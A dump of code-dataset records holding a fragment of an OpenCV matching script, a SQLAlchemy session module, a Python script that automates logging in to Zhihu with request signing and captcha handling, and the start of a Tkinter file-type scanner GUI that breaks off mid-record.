mng.resize(*mng.window.maxsize())\n\nfast_matching()\nplt.show()\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_create", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_TYPE_7_12", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "matcher.stable_SSD", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.DMatch", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.drawMatches", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "514508946", "text": "import time\n\nfrom oslo_log import log as logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import DisconnectionError, OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom conch import cfg\n\nconf = cfg.CONF.database\nLOG = logging.getLogger(__name__)\n\n_ENGINE = None\n_MAKER = None\n\n\ndef get_session(autocommit=True, expire_on_commit=False):\n global _MAKER\n\n if _MAKER is None:\n engine = get_engine()\n _MAKER = get_maker(engine, autocommit, expire_on_commit)\n\n session = _MAKER()\n return session\n\n\ndef ping_listener(dbapi_conn, connection_rec, connection_proxy):\n try:\n dbapi_conn.cursor().execute('select 1')\n except dbapi_conn.OperationalError as ex:\n if ex.args[0] in (2006, 2013, 2014, 2045, 2055):\n LOG.warn('Got mysql server has gone away: %s', ex)\n raise DisconnectionError(\"Database server went away\")\n else:\n raise\n\n\ndef is_db_connection_error(args):\n conn_err_codes = ('2002', '2003', '2006')\n for err_code in conn_err_codes:\n if args.find(err_code) != -1:\n return True\n return False\n\n\ndef get_engine():\n global _ENGINE\n if _ENGINE is None:\n\n engine_args = {\n \"pool_recycle\": conf.sql_idle_timeout,\n \"echo\": False,\n 'convert_unicode': True,\n \"pool_size\": conf.sql_pool_size,\n \"max_overflow\": conf.sql_max_overflow,\n }\n\n if conf.sql_connection_debug >= 100:\n engine_args['echo'] = 'debug'\n elif conf.sql_connection_debug >= 50:\n engine_args['echo'] = True\n\n _ENGINE = create_engine(conf.sql_connection, **engine_args)\n\n listen(_ENGINE, 'checkout', ping_listener)\n\n try:\n _ENGINE.connect()\n except OperationalError as e:\n if not is_db_connection_error(e.args[0]):\n raise\n\n remaining = conf.sql_max_retries\n if remaining == -1:\n remaining = 'infinite'\n while True:\n msg = ('SQL connection failed. %s attempts left.')\n LOG.warn(msg % remaining)\n if remaining != 'infinite':\n remaining -= 1\n time.sleep(conf.sql_retry_interval)\n try:\n _ENGINE.connect()\n break\n except OperationalError as e:\n if (remaining != 'infinite' and remaining == 0) or \\\n not is_db_connection_error(e.args[0]):\n raise\n return _ENGINE\n\n\ndef get_maker(engine, autocommit=True, expire_on_commit=False):\n return sessionmaker(bind=engine,\n autocommit=autocommit,\n expire_on_commit=expire_on_commit)\n", "sub_path": "conch/db/sqlalchemy/session.py", "file_name": "session.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "conch.cfg.CONF", "line_number": 11, "usage_type": "attribute"}, {"api_name": "conch.cfg", "line_number": 11, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.DisconnectionError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.event.listen", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 71, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 87, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "484197808", "text": "# coding: utf-8\n\nfrom http import cookiejar\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport requests\nimport time\nimport re\nimport json\nimport base64\nimport hmac\nimport hashlib\n\n\nHEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"www.zhihu.com\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\",\n}\n\nLOGIN_URL = 'https://www.zhihu.com/signup'\nLOGIN_API = 'https://www.zhihu.com/api/v3/oauth/sign_in'\n\nFORM_DATA = {\n\n \"client_id\": \"c3cef7c66a1843f8b3a9e6a1e3160e20\",\n \"grant_type\": \"password\",\n \"source\": \"com.zhihu.web\",\n \"username\": '',\n \"password\": '',\n \"lang\": \"cn\",\n \"ref_source\": \"homepage\",\n}\n\n\nclass ZHIHULogin(object):\n \n def __init__(self):\n\n self.login_url = LOGIN_URL\n self.login_api = LOGIN_API\n self.login_data = FORM_DATA\n self.session = requests.session()\n self.headers = HEADERS.copy()\n self.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')\n \n\n def login(self, load_cookies=True):\n \n \"\"\"\n 模拟登录知乎\n :param load_cookies: 是否读取上次保存的 Cookies\n :return: bool\n \"\"\"\n if load_cookies and self.load_cookies():\n if self.check_login():\n print('已读取 Cookies 并登录成功')\n return True\n else:\n print('保存的 Cookies 已过期,将重新登录')\n\n\n headers = self.headers.copy()\n xsrf, udid = self._get_token_udid()\n print(self.session.cookies.get_dict())\n headers.update({\n \"x-udid\": udid,\n \"x-xsrftoken\": xsrf,\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n })\n headers.update({'origin': 'https://www.zhihu.com','Referer': 'https://www.zhihu.com/signup','Accept': 'application/json, text/plain, */*'})\n self.login_data.update({\n 'username': self._input_data('username', '登录手机'),\n 'password': self._input_data('password', '密码')\n })\n timestamp = str(int(time.time()*1000))\n self.login_data.update({\n \"timestamp\": timestamp,\n \"signature\": self._get_signature(timestamp),\n \"captcha\": self._get_captcha(headers.copy()),\n })\n\n res = self.session.post(self.login_api, data=self.login_data, headers=headers)\n print(self.session.cookies.get_dict())\n print(res.text,res.status_code)\n if '验证码' in res.text:\n print('验证码错误')\n elif self.check_login():\n print('登录成功')\n return True\n print('登录失败')\n return False\n\n\n def load_cookies(self):\n \n \"\"\"\n 读取 Cookies 文件加载到 Session\n :retur\n \"\"\"\n try:\n self.cookies.load(ignore_discard=True)\n except FileNotFoundError:\n print('Cookies.txt 未找到,读取失败')\n else:\n #工具方法转换成字典\n load_cookies = requests.utils.dict_from_cookiejar(self.cookies)\n #工具方法将字典转换成RequestsCookieJar,赋值给session的cookies.\n self.session.cookies = requests.utils.cookiejar_from_dict(load_cookies)\n return True\n return False \n\n def check_login(self):\n \"\"\"\n 检查登录状态,访问登录页面出现跳转则是已登录,\n 如登录成功保存当前 Cookies\n :return: bool\n \"\"\"\n res = self.session.get(self.login_url, headers=self.headers, allow_redirects=False)\n print(res.status_code)\n if res.status_code == 302:\n # self.session.cookies.save()\n #将转换成字典格式的RequestsCookieJar(这里我用字典推导手动转的)保存到LWPcookiejar中\n requests.utils.cookiejar_from_dict({c.name: c.value for c in self.session.cookies}, self.cookies)\n self.cookies.save(ignore_discard=True, ignore_expires=True)\n return True\n return False\n\n def _get_token_udid(self):\n \"\"\"\n 从登录页面获取 token\n :return:\n \"\"\"\n cookies_dict = {}\n token = udid = None\n res = self.session.get(self.login_url,headers=self.headers) \n print(\"请求第一步:状态吗为: %s\" % res.status_code)\n if res.status_code == 200:\n # cookies_dict = requests.utils.dict_from_cookiejar(self.session.cookies)\n cookies_dict = self.session.cookies.get_dict()\n\n if cookies_dict['_xsrf']:\n token = cookies_dict.get('_xsrf')\n if cookies_dict['d_c0']:\n udid = cookies_dict.get('d_c0').split(\"|\")[0].replace(\"\\\"\",\"\")\n print(\"token is % and udis is %s\" % (token,udid))\n return token, udid\n\n\n def _get_captcha(self, headers, lang='cn'):\n \"\"\"\n 请求验证码的 API 接口,无论是否需要验证码都需要请求一次\n 如果需要验证码会返回图片的 base64 编码\n 可选择两种验证码,需要人工输入\n :param headers: 带授权信息的请求头部\n :param lang: 验证码的种类,中文是选倒立汉字,英文是输入字符\n :return: 验证码的 POST 参数\n \"\"\"\n\n if lang == 'cn':\n api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'\n else:\n api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'\n\n if headers.get('x-xsrftoken'):\n headers.pop('x-xsrftoken')\n res = self.session.get(api, headers=headers)\n print(\"请求第二步:状态吗为: %s\" % res.status_code)\n show_captcha = re.search(r'true', res.text)\n if show_captcha:\n put_res = self.session.put(api, headers=headers)\n content = base64.b64decode(josn.loads(put_res)['img_base64'])\n with open('./captcha.png', 'wb') as f:\n f.write(content)\n image = Image.open('./captcha.png')\n if lang == 'cn':\n plt.imshow(img) \n print('点击所有倒立的汉字,按回车提交')\n points = plt.ginput(7)\n capt = json.dumps({'img_size': [200, 44],'input_points': [[i[0]/2, i[1]/2] for i in points]})\n else:\n img.show()\n capt = input('请输入图片里的验证码:')\n \n # 这里必须先把参数 POST 验证码接口\n self.session.post(api, data={'input_text': capt}, headers=headers)\n return capt\n else:\n print(\"验证码False\")\n return ''\n\n\n def _get_signature(self, timestamp):\n \"\"\"\n 通过 Hmac 算法计算返回签名\n 实际是几个固定字符串加时间戳\n :param timestamp: 时间戳\n :return: 签名\n https://static.zhihu.com/heifetz/main.app.268c34bc2abd4304ea97.js\n \"\"\"\n ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)\n grant_type = self.login_data['grant_type']\n client_id = self.login_data['client_id']\n source = self.login_data['source']\n # 顺序不能错\n ha.update(bytes((grant_type + client_id + source + timestamp), 'utf-8'))\n signature = ha.hexdigest()\n print('签名字符串为:%s' % signature)\n return signature\n\n def _input_data(self, key, data_name):\n \"\"\"\n 用于手动输入指定 form_data 参数\n :param key: 键名\n :param data_name: 用于输入提示中文名\n :return: 输入的值\n \"\"\"\n value = self.login_data.get(key)\n if not value:\n value = input('请输入{}:'.format(data_name))\n return value\n\n\nif __name__ == '__main__':\n account = ZHIHULogin()\n account.login()\n # 登陆成功后请求如下页面测试\n # headers 里保留到如下即可正常 否则出现乱码\n # h: {'Host': 'zhuanlan.zhihu.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0', 'Referer': 'https://www.zhihu.com/'}\n # res = s.get('https://zhuanlan.zhihu.com/p/35986817',headers=h)\n", "sub_path": "zhihu/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 8474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.session", "line_number": 47, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 49, "usage_type": "call"}, {"api_name": "http.cookiejar", "line_number": 49, "usage_type": "name"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.utils.dict_from_cookiejar", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 111, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 128, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 173, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 176, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ginput", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 205, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 205, "usage_type": "attribute"}]} +{"seq_id": "194213413", "text": "#File Scanner\r\n#Made by Jack Carmichael\r\n\"\"\"\r\n===================================================================================\r\nObject--------------------Parameters--------------------Inheritance\r\n -AppWindow() -void -object\r\n -FileInfo() -frame -object\r\n -CurrentFileInfo() -frame -object\r\n -AcanGui() -file_listboxes,progress_bar -object\r\n -ProgressBar() -frame,length,height -TkinterWrapper.WindowCanvas\r\n -Scan() -directory,scan_gui -object\r\n -FIleType() -file_extension,file_consensus -object\r\n -FileTypeEditor() -parrent_window,edit_type -object\r\n -SetDirWindow() -parent_window -object\r\n -DirectoryListbox() -frame,companion_text_entry -TkinterWrapper.WindowListbox\r\n -ComputerDirectory() -void -object\r\n -SavedInfo() -void -object\r\n===================================================================================\r\nStill to do:\r\n -bind left click event with filetype listboxes. Options are to add to file type list\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom functools import partial\r\nimport UserErrorMessage\r\nimport TkinterWrapper\r\nimport FileWrapper\r\n\r\nALAPHABET=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nUP_TRIANGLE=\"{0}\".format('\\u25B2')\r\nDOWN_TRIANGLE=\"{0}\".format('\\u25BC')\r\nLEFT_TRIANGLE=\"{0}\".format('\\u25C0')\r\nRIGHT_TRIANGLE=\"{0}\".format('\\u25B6')\r\nSMALL_RIGHT_TRIANGLE=\"{0}\".format('\\u25B8')\r\n\r\n#SPLIT UP! Make information frame a class and call update methods on it\r\nclass AppWindow(object):\r\n def __init__(self):\r\n self.app_window=TkinterWrapper.Window(\"File Scanner\")\r\n self.update_scan_flags(False,False,False)\r\n self.__setup_window()\r\n self.__setup_menu()\r\n self.__setup_frames()\r\n self.update_frames()\r\n self.app_window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.app_window.remove_min_max_buttons(False)\r\n self.app_window.resizable(False,False)\r\n\r\n def __setup_menu(self):\r\n self.menu=TkinterWrapper.WindowMenu(self.app_window.get_window())\r\n self.file_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.file_cascade.add_item_to_cascade(\"Quit\",self.app_window.destroy_window)\r\n self.edit_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.edit_cascade.add_item_to_cascade(\"Known-Good Filetypes\",partial(self.add_known_file_type,\"KnownGood\"))\r\n self.edit_cascade.add_item_to_cascade(\"Known-Bad Filetypes\",partial(self.add_known_file_type,\"KnownBad\"))\r\n self.menu.add_cascade_to_menu(\"File\",self.file_cascade.get_cascade())\r\n self.menu.add_cascade_to_menu(\"Edit\",self.edit_cascade.get_cascade())\r\n\r\n def __setup_frames(self):\r\n self.process_information_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.found_files_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.current_file_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n for item in [[self.process_information_frame,\"top\"],[self.current_file_frame,\"top\"],[self.found_files_frame,\"top\"]]:\r\n item[0].pack_frame(item[1],0,0)\r\n self.file_information_frame=FileInfo(self.found_files_frame.get_frame())\r\n self.current_file_information_frame=CurrentFileInfo(self.current_file_frame)\r\n\r\n def update_frames(self):\r\n self.process_information_frame.destroy_all_child_widgets()\r\n self.update_process_information_frame()\r\n self.file_information_frame.update_frame(self.directory_set,self.process_running,self.scan_finished)\r\n self.current_file_information_frame.update_frame(self.process_running)\r\n\r\n def update_process_information_frame(self):\r\n if self.process_running==False and self.directory_set==False and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Please select a folder to scan.\",\"Set Search Folder\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==False and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Set to scan: {0}\".format(saved_information.get_directory_to_scan()),\"Scan\",self.commence_scan)\r\n self.add_button_to_process_information_frame(\"Change Folder To Scan\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==True and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_task()\r\n elif self.process_running==False and self.directory_set==False and self.scan_finished==True:\r\n self.update_process_information_frame_for_idle(\"Scan Completed\",\"Scan Something Else\",self.open_dir_selection_dialogbox)\r\n\r\n def update_process_information_frame_for_idle(self,top_text,button_text,button_action):\r\n label=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"{0}\".format(top_text))\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,0)\r\n self.add_button_to_process_information_frame(button_text,button_action)\r\n def add_button_to_process_information_frame(self,button_text,button_action):\r\n button=TkinterWrapper.WindowButton(self.process_information_frame.get_frame(),\"{0}\".format(button_text),button_action)\r\n button.pack_button(\"top\",0,1)\r\n\r\n def update_process_information_frame_for_task(self):\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning....\")\r\n top_text.configure_colors(\"grey20\",\"grey95\",\"times 14\")\r\n top_text.pack_label(\"top\",0,0)\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning: {0}\".format(saved_information.get_directory_to_scan()))\r\n top_text.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n top_text.pack_label(\"top\",0,0)\r\n self.progress_bar=Progressbar(self.process_information_frame.get_frame(),400,30)\r\n\r\n def add_known_file_type(self,type_consensus):\r\n dialog_box=FileTypeEditor(self.app_window.get_window(),type_consensus)\r\n\r\n def open_dir_selection_dialogbox(self):\r\n directory_selection=SetDirWindow(self.app_window.get_window())\r\n if directory_selection.get_saved_directory!=\"\":\r\n saved_information.set_directory_to_scan(directory_selection.get_saved_directory())\r\n self.update_scan_flags(True,False,False)\r\n self.update_frames()\r\n\r\n def commence_scan(self):\r\n self.update_scan_flags(True,True,False)\r\n self.update_frames()\r\n scan_gui=ScanGUI(self.file_information_frame.get_listboxes(),self.progress_bar,self.current_file_information_frame)\r\n self.scan=Scan(saved_information.get_directory_to_scan(),scan_gui)\r\n self.scan.start()\r\n scan_gui.start_checking_for_selection()\r\n self.update_scan_flags(False,False,True)\r\n self.update_frames()\r\n\r\n def update_scan_flags(self,directory_set_flag,process_running_flag,scan_finished_flag):\r\n self.process_running=process_running_flag\r\n self.directory_set=directory_set_flag\r\n self.scan_finished=scan_finished_flag\r\n\r\n\r\nclass FileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_file_types_frames()\r\n\r\n def __setup_file_types_frames(self):\r\n self.ok_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.bad_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.unknown_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n for frame in [[self.ok_files_frame,\"left\"],[self.bad_files_frame,\"left\"],[self.unknown_files_frame,\"left\"]]:\r\n frame[0].pack_frame(frame[1],0,0)\r\n\r\n def update_frame(self,directory_set,process_running,scan_finished):\r\n self.destroy_all_widgets(scan_finished)\r\n if (process_running==False or directory_set==False) and scan_finished!=True:\r\n for item in [[self.ok_files_frame,\"Ok\"],[self.bad_files_frame,\"Potentialy Harmfull\"],[self.unknown_files_frame,\"Unknown\"]]:\r\n item[0].configure_border(\"ridge\",2)\r\n self.insert_file_explaning_note(item[0],item[1])\r\n elif process_running==True and directory_set==True:\r\n self.listboxes=[]\r\n self.update_file_frame_for_task(self.ok_files_frame.get_frame(),\"Ok\")\r\n self.update_file_frame_for_task(self.bad_files_frame.get_frame(),\"Potentialy Harmfull\")\r\n self.update_file_frame_for_task(self.unknown_files_frame.get_frame(),\"Unknown\")\r\n\r\n def destroy_all_widgets(self,scan_finished):\r\n if scan_finished!=True:\r\n for frame in [self.ok_files_frame,self.bad_files_frame,self.unknown_files_frame]:\r\n frame.destroy_all_child_widgets()\r\n\r\n def insert_file_explaning_note(self,frame,text):\r\n information_label=TkinterWrapper.WindowLabel(frame.get_frame(),\"{0} files will be\\nshown here after a scan\".format(text))\r\n information_label.configure_colors(\"grey50\",\"grey95\",\"times 10\")\r\n information_label.pack_label(\"top\",0,2)\r\n\r\n def update_file_frame_for_task(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,\"{0} Files:\".format(text))\r\n label.configure_colors(\"grey60\",\"grey95\",\"times 12\")\r\n label.pack_label(\"top\",0,0)\r\n self.setup_textbox_frame(frame)\r\n self.setup_textbox_x_scrollbar_frame(frame)\r\n\r\n def setup_textbox_frame(self,file_frame):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n listbox=TkinterWrapper.WindowListbox(frame.get_frame())\r\n listbox.pack_listbox(\"left\",0,0)\r\n listbox.configure_size(40,30)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"y\")\r\n scrollbar.attach_to_widget(listbox.get_listbox())\r\n listbox.attach_scrollbar(\"y\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"left\",0,0)\r\n self.listboxes.append(listbox)\r\n\r\n def setup_textbox_x_scrollbar_frame(self,file_frame,):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"x\")\r\n scrollbar.attach_to_widget(self.listboxes[len(self.listboxes)-1].get_listbox())\r\n self.listboxes[len(self.listboxes)-1].attach_scrollbar(\"x\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"top\",0,0) \r\n\r\n def get_listboxes(self):\r\n return self.listboxes\r\n\r\n\r\nclass CurrentFileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_dummy_frame()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def __setup_dummy_frame(self):\r\n dummy_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n dummy_frame.pack_frame(\"top\",0,0)\r\n\r\n def setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n for frame,position in [[self.top_frame,\"top\"],[self.bottom_frame,\"top\"]]:\r\n frame.pack_frame(position,0,0)\r\n\r\n def make_labels(self):\r\n self.file_fraction=TkinterWrapper.WindowLabel(self.top_frame.get_frame(),\"\")\r\n self.file_fraction.configure_colors(\"grey40\",\"grey95\",\"times 11\")\r\n self.current_file=TkinterWrapper.WindowLabel(self.bottom_frame.get_frame(),\"Current File:\")\r\n self.current_file.configure_colors(\"grey40\",\"grey95\",\"times 10\")\r\n self.file_entry=TkinterWrapper.WindowEntry(self.bottom_frame.get_frame())\r\n self.file_entry.configure_size(115)\r\n\r\n def update_frame(self,process_running):\r\n if process_running==True:\r\n self.file_fraction.pack_label(\"top\",0,0)\r\n self.current_file.pack_label(\"left\",0,0)\r\n self.file_entry.pack_entry(\"left\",0,0)\r\n else:\r\n self.top_frame.destroy()\r\n self.bottom_frame.destroy()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def update_file_fraction(self,numerator,denominator):\r\n self.file_fraction.configure_text(\"{0} out of {1} files scanned\".format(numerator,denominator))\r\n def update_current_file(self,current_file_directory):\r\n self.file_entry.configure_entry_text(\"{0}\".format(current_file_directory))\r\n\r\n\r\nclass ScanGUI(object):\r\n def __init__(self,file_listboxes,progress_bar,current_info):\r\n self.file_listboxes=file_listboxes\r\n self.progress_bar=progress_bar\r\n self.current_file_information=current_info\r\n self.selections=[[\"\",\"\"],[\"\",\"\"],[\"\",\"\"]]\r\n self.listbox_being_used=[False,False,False]\r\n\r\n def update_file_lists(self,files):\r\n self.file_list=files\r\n self.check_for_selection()\r\n for x in range(0,3):\r\n if self.listbox_being_used[x]==False:\r\n self.file_listboxes[x].delete_text(0,\"end\")\r\n for file in files:\r\n if (file.get_file_consensus()==\"KnownGood\" and self.listbox_being_used[0]==False) or\\\r\n (file.get_file_consensus()==\"KnownBad\" and self.listbox_being_used[1]==False) or\\\r\n (file.get_file_consensus()==\"Unknown\" and self.listbox_being_used[2]==False):\r\n self.add_item_to_listbox(file.get_file_consensus(),file.get_file_extension(),file.get_number_of_files())\r\n\r\n def add_item_to_listbox(self,item_consensus,item_name,number_of_item):\r\n if item_consensus==\"KnownGood\":\r\n self.file_listboxes[0].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"KnownBad\":\r\n self.file_listboxes[1].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"Unknown\":\r\n self.file_listboxes[2].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n\r\n def update_progress_bar(self,percentage,part,total_parts):\r\n self.progress_bar.update(percentage,part,total_parts)\r\n\r\n def update_current_information(self,numerator,denominator,current_file_directory):\r\n self.current_file_information.update_file_fraction(numerator,denominator)\r\n self.current_file_information.update_current_file(current_file_directory)\r\n\r\n def start_checking_for_selection(self):\r\n self.check_for_selection()\r\n #This is not a good solution, better way to check every 250ms?\r\n self.file_listboxes[0].get_listbox().after(250,self.start_checking_for_selection)\r\n\r\n def check_for_selection(self):\r\n for x in range(0,3):\r\n self.selections[x][0]=self.file_listboxes[x].get_current_selection()\r\n self.selections[x][0]=self.file_listboxes[x].get_text_from_index(self.selections[x][0])\r\n for x in range(0,3):\r\n if self.selections[x][0]!=self.selections[x][1] and self.selections[x][0]!=None:\r\n print(\"Selection in listbox {0} has changed to: {1}\".format(x,self.selections[x][0]))\r\n self.selection_actions(x)\r\n self.selections[x][1]=self.selections[x][0]\r\n\r\n def selection_actions(self,listbox):\r\n if RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.show_file_type_places(self.selections[listbox][0],listbox)\r\n elif LEFT_TRIANGLE in self.selections[listbox][0]:\r\n self.go_back_to_file_type_list(listbox)\r\n elif SMALL_RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.open_file_explorer(self.selections[listbox][0])\r\n\r\n def show_file_type_places(self,selection,listbox):\r\n self.listbox_being_used[listbox]=True\r\n print(\"Selection: \"+selection)\r\n for file in self.file_list:\r\n if file.get_file_extension()==self.get_file_extension_from_selection(selection):\r\n self.insert_file_places(file,listbox)\r\n\r\n def get_file_extension_from_selection(self,selection):\r\n file_extension=\"\"\r\n for x in range(2,len(selection)):\r\n if selection[x]!=\" \" and selection[x]!=\"(\" and selection[x]!=\")\":\r\n file_extension+=selection[x]\r\n else:\r\n return file_extension\r\n\r\n def insert_file_places(self,file_type,listbox):\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n self.add_directional_information(listbox)\r\n for item in file_type.get_file_type_locations():\r\n self.file_listboxes[listbox].insert_text(\"{0} {1}\\n\".format(SMALL_RIGHT_TRIANGLE,item),\"end\")\r\n\r\n def add_directional_information(self,listbox):\r\n self.file_listboxes[listbox].insert_text(\"{0} Back to File List\\n\".format(LEFT_TRIANGLE),\"end\")\r\n self.file_listboxes[listbox].insert_text(\"{0} {1} Files\\n\".format(DOWN_TRIANGLE,self.get_file_extension_from_selection\\\r\n (self.selections[listbox][0])),\"end\")\r\n\r\n def go_back_to_file_type_list(self,listbox):\r\n self.listbox_being_used[listbox]=False\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n for file in self.file_list:\r\n if 